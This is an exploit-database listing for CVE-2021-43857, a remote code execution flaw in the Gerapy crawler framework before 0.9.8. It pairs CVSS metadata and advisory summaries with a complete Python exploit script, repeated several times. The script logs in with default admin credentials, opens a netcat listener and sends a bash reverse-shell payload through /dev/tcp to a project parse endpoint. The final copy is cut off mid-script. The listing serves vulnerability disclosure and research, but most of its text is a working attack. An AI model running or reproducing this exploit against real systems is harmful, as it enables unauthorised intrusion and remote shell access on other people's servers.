Gerapy 0.9.7 - Remote Code Execution (Authenticated) Exploit

2022-01-06T00:00:00

Description

{"id": "1337DAY-ID-37199", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Gerapy 0.9.7 - Remote Code Execution (Authenticated) Exploit", "description": "", "published": "2022-01-06T00:00:00", "modified": "2022-01-06T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/37199", "reporter": "Jeremiasz Pluta", "references": [], "cvelist": ["CVE-2021-43857"], "immutableFields": [], "lastseen": "2022-01-08T13:20:12", "viewCount": 116, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-43857"]}, {"type": "exploitdb", "idList": ["EDB-ID:50640"]}, {"type": "github", "idList": ["GHSA-9W7F-M4J4-J3XW"]}, {"type": "githubexploit", "idList": ["3049EF3C-E45E-5104-AE92-B128BA9E9A57"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165459"]}], "rev": 4}, "score": {"value": 7.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-43857"]}, {"type": "exploitdb", "idList": ["EDB-ID:50640"]}, {"type": "github", "idList": ["GHSA-9W7F-M4J4-J3XW"]}, {"type": "githubexploit", "idList": ["3049EF3C-E45E-5104-AE92-B128BA9E9A57"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165459"]}]}, "exploitation": null, "vulnersScore": 7.0}, "sourceHref": "https://0day.today/exploit/37199", "sourceData": "# Exploit Title: Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)\n# Exploit Author: Jeremiasz Pluta\n# Vendor Homepage: https://github.com/Gerapy/Gerapy\n# Version: All versions of Gerapy prior to 0.9.8\n# CVE: CVE-2021-43857\n# Tested on: Gerapy 0.9.6\n\n# Vulnerability: Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8.\n\n#!/usr/bin/python\nimport sys\nimport re\nimport argparse\nimport pyfiglet\nimport requests\nimport time\nimport json\nimport subprocess\n\nbanner = pyfiglet.figlet_format(\"CVE-2021-43857\")\nprint(banner)\nprint('Exploit for CVE-2021-43857')\nprint('For: Gerapy < 0.9.8')\n\nlogin = \"admin\" #CHANGE ME IF NEEDED\npassword = \"admin\" #CHANGE ME IF NEEDED\n\nclass Exploit:\n\n\tdef __init__(self, target_ip, target_port, localhost, localport):\n\t\tself.target_ip = target_ip\n\t\tself.target_port = target_port\n\t\tself.localhost = localhost\n\t\tself.localport = localport\n\n\tdef exploitation(self):\n\t\tpayload = \"\"\"{\"spider\":\"`/bin/bash -c 'bash -i >& /dev/tcp/\"\"\" + localhost + \"\"\"/\"\"\" + localport + \"\"\" 0>&1'`\"}\"\"\"\n\n\t\t#Login to the app (getting auth token)\n\t\turl = \"http://\" + target_ip + \":\" + target_port\n\t\tr = requests.Session()\n\t\tprint(\"[*] Resolving URL...\")\n\t\tr1 = r.get(url)\n\t\ttime.sleep(3)\n\t\tprint(\"[*] Logging in to application...\")\n\t\tr2 = r.post(url + \"/api/user/auth\", json={\"username\":login,\"password\":password}, allow_redirects=True)\n\t\ttime.sleep(3)\n\t\tif (r2.status_code == 200):\n\t\t\tprint('[*] Login successful! Proceeding...')\n\t\telse:\n\t\t\tprint('[*] Something went wrong!')\n\t\t\tquit()\n\n\t\t#Create a header out of auth token (yep, it's bad as it looks)\n\t\tdict = json.loads(r2.text)\n\t\ttemp_token = 'Token '\n\t\ttemp_token2 = json.dumps(dict['token']).strip('\"')\n\t\tauth_token = {}\n\t\tauth_token['Authorization'] = temp_token + temp_token2\n\n\t\t#Get the project list\n\t\tprint(\"[*] Getting the project list\")\n\t\tr3 = r.get(url + \"/api/project/index\", headers=auth_token, allow_redirects=True)\n\t\ttime.sleep(3)\n\n\t\tif (r3.status_code != 200):\n\t\t\tprint(\"[!] Something went wrong! Maybe the token is corrupted?\")\n\t\t\tquit();\n\n\t\t#Parse the project name for a request (yep, it's worse than earlier)\n\t\tdict = r3.text # [{'name': 'test'}]\n\t\tdict2 = json.dumps(dict)\n\t\tdict3 = json.loads(dict2)\n\t\tdict3 = json.loads(dict3)\n\t\tname = dict3[0]['name']\n\t\tprint(\"[*] Found project: \" + name)\n\n\t\t#use the id to check the project\n\t\tprint(\"[*] Getting the ID of the project to build the URL\")\n\t\tr4 = r.get(url + \"/api/project/\" + name + \"/build\", headers=auth_token, allow_redirects=True)\n\t\ttime.sleep(3)\n\t\tif (r4.status_code != 200):\n\t\t\tprint(\"[*] Something went wrong! I can't reach the found project!\")\n\t\t\tquit();\n\n\t\t#format the json to dict\n\t\tdict = r4.text\n\t\tdict2 = json.dumps(dict)\n\t\tdict3 = json.loads(dict2)\n\t\tdict3 = json.loads(dict3)\n\t\tid = dict3['id']\n\t\tprint(\"[*] Found ID of the project: \", id)\n\t\ttime.sleep(1)\n\n\t\t#netcat listener\n\t\tprint(\"[*] Setting up a netcat listener\")\n\t\tlistener = subprocess.Popen([\"nc\", \"-nvlp\", self.localport])\n\t\ttime.sleep(3)\n\n\t\t#exec the payload\n\t\tprint(\"[*] Executing reverse shell payload\")\n\t\tprint(\"[*] Watchout for shell! :)\")\n\t\tr5 = r.post(url + \"/api/project/\" + str(id) + \"/parse\", data=payload, headers=auth_token, allow_redirects=True)\n\t\tlistener.wait()\n\n\t\tif (r5.status_code == 200):\n\t\t\tprint(\"[*] It worked!\")\n\t\t\tlistener.wait()\n\t\telse:\n\t\t\tprint(\"[!] Something went wrong!\")\n\t\t\tlistener.terminate()\n\ndef get_args():\n\tparser = argparse.ArgumentParser(description='Gerapy < 0.9.8 - Remote Code Execution (RCE) (Authenticated)')\n\tparser.add_argument('-t', '--target', dest=\"url\", required=True, action='store', help='Target IP')\n\tparser.add_argument('-p', '--port', dest=\"target_port\", required=True, action='store', help='Target port')\n\tparser.add_argument('-L', '--lh', dest=\"localhost\", required=True, action='store', help='Listening IP')\n\tparser.add_argument('-P', '--lp', dest=\"localport\", required=True, action='store', help='Listening port')\n\targs = parser.parse_args()\n\treturn args\n\nargs = get_args()\ntarget_ip = args.url\ntarget_port = args.target_port\nlocalhost = args.localhost\nlocalport = args.localport\n\nexp = Exploit(target_ip, target_port, localhost, localport)\nexp.exploitation()\n", "category": "remote exploits", "verified": true, "_state": {"dependencies": 1646443836}}

{"github": [{"lastseen": "2022-01-07T20:56:24", "description": "### Impact\n\nproject_configure function exist remote code execute in Gerapy < 0.9.8\n\n### Patches\n\nPatched in version 0.9.8, please install with:\n\n```\npip3 install -U gerapy\n```", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-06T17:36:38", "type": "github", "title": "Gerapy < 0.9.8 may cause remote code execution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43857"], "modified": "2022-01-06T20:20:10", "id": "GHSA-9W7F-M4J4-J3XW", "href": "https://github.com/advisories/GHSA-9w7f-m4j4-j3xw", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-06-29T03:04:20", "description": "# CVE-2021-43857\nCVE-2021-43857(gerapy\u547d\u4ee4\u6267\u884c)\n# \u514d\u8d23\u58f0\u660e\n```\n\u811a\u672c\u4ec5\u4f9b\u5b66\u4e60\u53c2\u8003\uff0c...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T01:38:06", "type": "githubexploit", "title": "Exploit for Vulnerability in Gerapy", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43857"], "modified": "2022-04-28T02:08:14", "id": "668D480E-7AB9-565C-AB21-4B6C41241F57", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T10:07:21", "description": "# CVE-2021-43857\nGerapy prior to version 0.9.8 is vulnerable to ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-03T16:47:42", "type": "githubexploit", "title": "Exploit for Vulnerability in Gerapy", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43857"], "modified": "2022-04-26T09:00:40", "id": "3049EF3C-E45E-5104-AE92-B128BA9E9A57", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}], "cve": [{"lastseen": "2022-03-23T19:45:12", "description": "Gerapy is a distributed crawler management framework. Gerapy prior to version 0.9.8 is vulnerable to remote code execution, and this issue is patched in version 0.9.8.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-27T19:15:00", "type": "cve", "title": "CVE-2021-43857", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43857"], "modified": "2022-01-07T18:16:00", "cpe": [], "id": "CVE-2021-43857", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43857", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "osv": [{"lastseen": "2022-06-10T05:05:18", "description": "### Impact\n\nproject_configure function exist remote code execute in Gerapy < 0.9.8\n\n### Patches\n\nPatched in version 0.9.8, please install with:\n\n```\npip3 install -U gerapy\n```", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-06T17:36:38", "type": "osv", "title": "Gerapy < 0.9.8 may cause remote code execution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43857"], "modified": "2022-06-10T02:08:31", "id": "OSV:GHSA-9W7F-M4J4-J3XW", "href": "https://osv.dev/vulnerability/GHSA-9w7f-m4j4-j3xw", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-11T21:10:37", "description": "Gerapy is a distributed crawler management framework. Gerapy prior to version 0.9.8 is vulnerable to remote code execution, and this issue is patched in version 0.9.8.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-27T19:15:00", "type": "osv", "title": "PYSEC-2021-867", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43857"], "modified": "2022-01-07T19:22:06", "id": "OSV:PYSEC-2021-867", "href": "https://osv.dev/vulnerability/PYSEC-2021-867", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-01-05T17:16:20", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-05T00:00:00", "type": "packetstorm", "title": "Gerapy 0.9.7 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-43857"], "modified": "2022-01-05T00:00:00", "id": "PACKETSTORM:165459", "href": "https://packetstormsecurity.com/files/165459/Gerapy-0.9.7-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated) \n# Date: 03/01/2022 \n# Exploit Author: Jeremiasz Pluta \n# Vendor Homepage: https://github.com/Gerapy/Gerapy \n# Version: All versions of Gerapy prior to 0.9.8 \n# CVE: CVE-2021-43857 \n# Tested on: Gerapy 0.9.6 \n \n# Vulnerability: Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8. \n \n#!/usr/bin/python \nimport sys \nimport re \nimport argparse \nimport pyfiglet \nimport requests \nimport time \nimport json \nimport subprocess \n \nbanner = pyfiglet.figlet_format(\"CVE-2021-43857\") \nprint(banner) \nprint('Exploit for CVE-2021-43857') \nprint('For: Gerapy < 0.9.8') \n \nlogin = \"admin\" #CHANGE ME IF NEEDED \npassword = \"admin\" #CHANGE ME IF NEEDED \n \nclass Exploit: \n \ndef __init__(self, target_ip, target_port, localhost, localport): \nself.target_ip = target_ip \nself.target_port = target_port \nself.localhost = localhost \nself.localport = localport \n \ndef exploitation(self): \npayload = \"\"\"{\"spider\":\"`/bin/bash -c 'bash -i >& /dev/tcp/\"\"\" + localhost + \"\"\"/\"\"\" + localport + \"\"\" 0>&1'`\"}\"\"\" \n \n#Login to the app (getting auth token) \nurl = \"http://\" + target_ip + \":\" + target_port \nr = requests.Session() \nprint(\"[*] Resolving URL...\") \nr1 = r.get(url) \ntime.sleep(3) \nprint(\"[*] Logging in to application...\") \nr2 = r.post(url + \"/api/user/auth\", json={\"username\":login,\"password\":password}, allow_redirects=True) \ntime.sleep(3) \nif (r2.status_code == 200): \nprint('[*] Login successful! Proceeding...') \nelse: \nprint('[*] Something went wrong!') \nquit() \n \n#Create a header out of auth token (yep, it's bad as it looks) \ndict = json.loads(r2.text) \ntemp_token = 'Token ' \ntemp_token2 = json.dumps(dict['token']).strip('\"') \nauth_token = {} \nauth_token['Authorization'] = temp_token + temp_token2 \n \n#Get the project list \nprint(\"[*] Getting the project list\") \nr3 = r.get(url + \"/api/project/index\", headers=auth_token, allow_redirects=True) \ntime.sleep(3) \n \nif (r3.status_code != 200): \nprint(\"[!] Something went wrong! Maybe the token is corrupted?\") \nquit(); \n \n#Parse the project name for a request (yep, it's worse than earlier) \ndict = r3.text # [{'name': 'test'}] \ndict2 = json.dumps(dict) \ndict3 = json.loads(dict2) \ndict3 = json.loads(dict3) \nname = dict3[0]['name'] \nprint(\"[*] Found project: \" + name) \n \n#use the id to check the project \nprint(\"[*] Getting the ID of the project to build the URL\") \nr4 = r.get(url + \"/api/project/\" + name + \"/build\", headers=auth_token, allow_redirects=True) \ntime.sleep(3) \nif (r4.status_code != 200): \nprint(\"[*] Something went wrong! I can't reach the found project!\") \nquit(); \n \n#format the json to dict \ndict = r4.text \ndict2 = json.dumps(dict) \ndict3 = json.loads(dict2) \ndict3 = json.loads(dict3) \nid = dict3['id'] \nprint(\"[*] Found ID of the project: \", id) \ntime.sleep(1) \n \n#netcat listener \nprint(\"[*] Setting up a netcat listener\") \nlistener = subprocess.Popen([\"nc\", \"-nvlp\", self.localport]) \ntime.sleep(3) \n \n#exec the payload \nprint(\"[*] Executing reverse shell payload\") \nprint(\"[*] Watchout for shell! :)\") \nr5 = r.post(url + \"/api/project/\" + str(id) + \"/parse\", data=payload, headers=auth_token, allow_redirects=True) \nlistener.wait() \n \nif (r5.status_code == 200): \nprint(\"[*] It worked!\") \nlistener.wait() \nelse: \nprint(\"[!] Something went wrong!\") \nlistener.terminate() \n \ndef get_args(): \nparser = argparse.ArgumentParser(description='Gerapy < 0.9.8 - Remote Code Execution (RCE) (Authenticated)') \nparser.add_argument('-t', '--target', dest=\"url\", required=True, action='store', help='Target IP') \nparser.add_argument('-p', '--port', dest=\"target_port\", required=True, action='store', help='Target port') \nparser.add_argument('-L', '--lh', dest=\"localhost\", required=True, action='store', help='Listening IP') \nparser.add_argument('-P', '--lp', dest=\"localport\", required=True, action='store', help='Listening port') \nargs = parser.parse_args() \nreturn args \n \nargs = get_args() \ntarget_ip = args.url \ntarget_port = args.target_port \nlocalhost = args.localhost \nlocalport = args.localport \n \nexp = Exploit(target_ip, target_port, localhost, localport) \nexp.exploitation() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165459/gerapy097-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "veracode": [{"lastseen": "2022-05-12T00:17:35", "description": "gerapy is vulnerable to remote code execution. Insecure loading of `project_configure` function allows an attacker to execute arbitrary code embedded in view file.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-28T01:47:07", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43857"], "modified": "2022-01-07T19:12:38", "id": "VERACODE:33464", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-33464/summary", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-01-13T05:27:25", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-05T00:00:00", "type": "exploitdb", "title": "Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43857", "2021-43857"], "modified": "2022-01-05T00:00:00", "id": "EDB-ID:50640", "href": "https://www.exploit-db.com/exploits/50640", "sourceData": "# Exploit Title: Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)\r\n# Date: 03/01/2022\r\n# Exploit Author: Jeremiasz Pluta\r\n# Vendor Homepage: https://github.com/Gerapy/Gerapy\r\n# Version: All versions of Gerapy prior to 0.9.8\r\n# CVE: CVE-2021-43857\r\n# Tested on: Gerapy 0.9.6\r\n\r\n# Vulnerability: Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8.\r\n\r\n#!/usr/bin/python\r\nimport sys\r\nimport re\r\nimport argparse\r\nimport pyfiglet\r\nimport requests\r\nimport time\r\nimport json\r\nimport subprocess\r\n\r\nbanner = pyfiglet.figlet_format(\"CVE-2021-43857\")\r\nprint(banner)\r\nprint('Exploit for CVE-2021-43857')\r\nprint('For: Gerapy < 0.9.8')\r\n\r\nlogin = \"admin\" #CHANGE ME IF NEEDED\r\npassword = \"admin\" #CHANGE ME IF NEEDED\r\n\r\nclass Exploit:\r\n\r\n\tdef __init__(self, target_ip, target_port, localhost, localport):\r\n\t\tself.target_ip = target_ip\r\n\t\tself.target_port = target_port\r\n\t\tself.localhost = localhost\r\n\t\tself.localport = localport\r\n\r\n\tdef exploitation(self):\r\n\t\tpayload = \"\"\"{\"spider\":\"`/bin/bash -c 'bash -i >& /dev/tcp/\"\"\" + localhost + \"\"\"/\"\"\" + localport + \"\"\" 0>&1'`\"}\"\"\"\r\n\r\n\t\t#Login to the app (getting auth token)\r\n\t\turl = \"http://\" + target_ip + \":\" + target_port\r\n\t\tr = requests.Session()\r\n\t\tprint(\"[*] Resolving URL...\")\r\n\t\tr1 = r.get(url)\r\n\t\ttime.sleep(3)\r\n\t\tprint(\"[*] Logging in to application...\")\r\n\t\tr2 = r.post(url + \"/api/user/auth\", json={\"username\":login,\"password\":password}, allow_redirects=True)\r\n\t\ttime.sleep(3)\r\n\t\tif (r2.status_code == 200):\r\n\t\t\tprint('[*] Login successful! Proceeding...')\r\n\t\telse:\r\n\t\t\tprint('[*] Something went wrong!')\r\n\t\t\tquit()\r\n\r\n\t\t#Create a header out of auth token (yep, it's bad as it looks)\r\n\t\tdict = json.loads(r2.text)\r\n\t\ttemp_token = 'Token '\r\n\t\ttemp_token2 = json.dumps(dict['token']).strip('\"')\r\n\t\tauth_token = {}\r\n\t\tauth_token['Authorization'] = temp_token + temp_token2\r\n\r\n\t\t#Get the project list\r\n\t\tprint(\"[*] Getting the project list\")\r\n\t\tr3 = r.get(url + \"/api/project/index\", headers=auth_token, allow_redirects=True)\r\n\t\ttime.sleep(3)\r\n\r\n\t\tif (r3.status_code != 200):\r\n\t\t\tprint(\"[!] Something went wrong! Maybe the token is corrupted?\")\r\n\t\t\tquit();\r\n\r\n\t\t#Parse the project name for a request (yep, it's worse than earlier)\r\n\t\tdict = r3.text # [{'name': 'test'}]\r\n\t\tdict2 = json.dumps(dict)\r\n\t\tdict3 = json.loads(dict2)\r\n\t\tdict3 = json.loads(dict3)\r\n\t\tname = dict3[0]['name']\r\n\t\tprint(\"[*] Found project: \" + name)\r\n\r\n\t\t#use the id to check the project\r\n\t\tprint(\"[*] Getting the ID of the project to build the URL\")\r\n\t\tr4 = r.get(url + \"/api/project/\" + name + \"/build\", headers=auth_token, allow_redirects=True)\r\n\t\ttime.sleep(3)\r\n\t\tif (r4.status_code != 200):\r\n\t\t\tprint(\"[*] Something went wrong! I can't reach the found project!\")\r\n\t\t\tquit();\r\n\r\n\t\t#format the json to dict\r\n\t\tdict = r4.text\r\n\t\tdict2 = json.dumps(dict)\r\n\t\tdict3 = json.loads(dict2)\r\n\t\tdict3 = json.loads(dict3)\r\n\t\tid = dict3['id']\r\n\t\tprint(\"[*] Found ID of the project: \", id)\r\n\t\ttime.sleep(1)\r\n\r\n\t\t#netcat listener\r\n\t\tprint(\"[*] Setting up a netcat listener\")\r\n\t\tlistener = subprocess.Popen([\"nc\", \"-nvlp\", self.localport])\r\n\t\ttime.sleep(3)\r\n\r\n\t\t#exec the payload\r\n\t\tprint(\"[*] Executing reverse shell payload\")\r\n\t\tprint(\"[*] Watchout for shell! :)\")\r\n\t\tr5 = r.post(url + \"/api/project/\" + str(id) + \"/parse\", data=payload, headers=auth_token, allow_redirects=True)\r\n\t\tlistener.wait()\r\n\r\n\t\tif (r5.status_code == 200):\r\n\t\t\tprint(\"[*] It worked!\")\r\n\t\t\tlistener.wait()\r\n\t\telse:\r\n\t\t\tprint(\"[!] Something went wrong!\")\r\n\t\t\tlistener.terminate()\r\n\r\ndef get_args():\r\n\tparser = 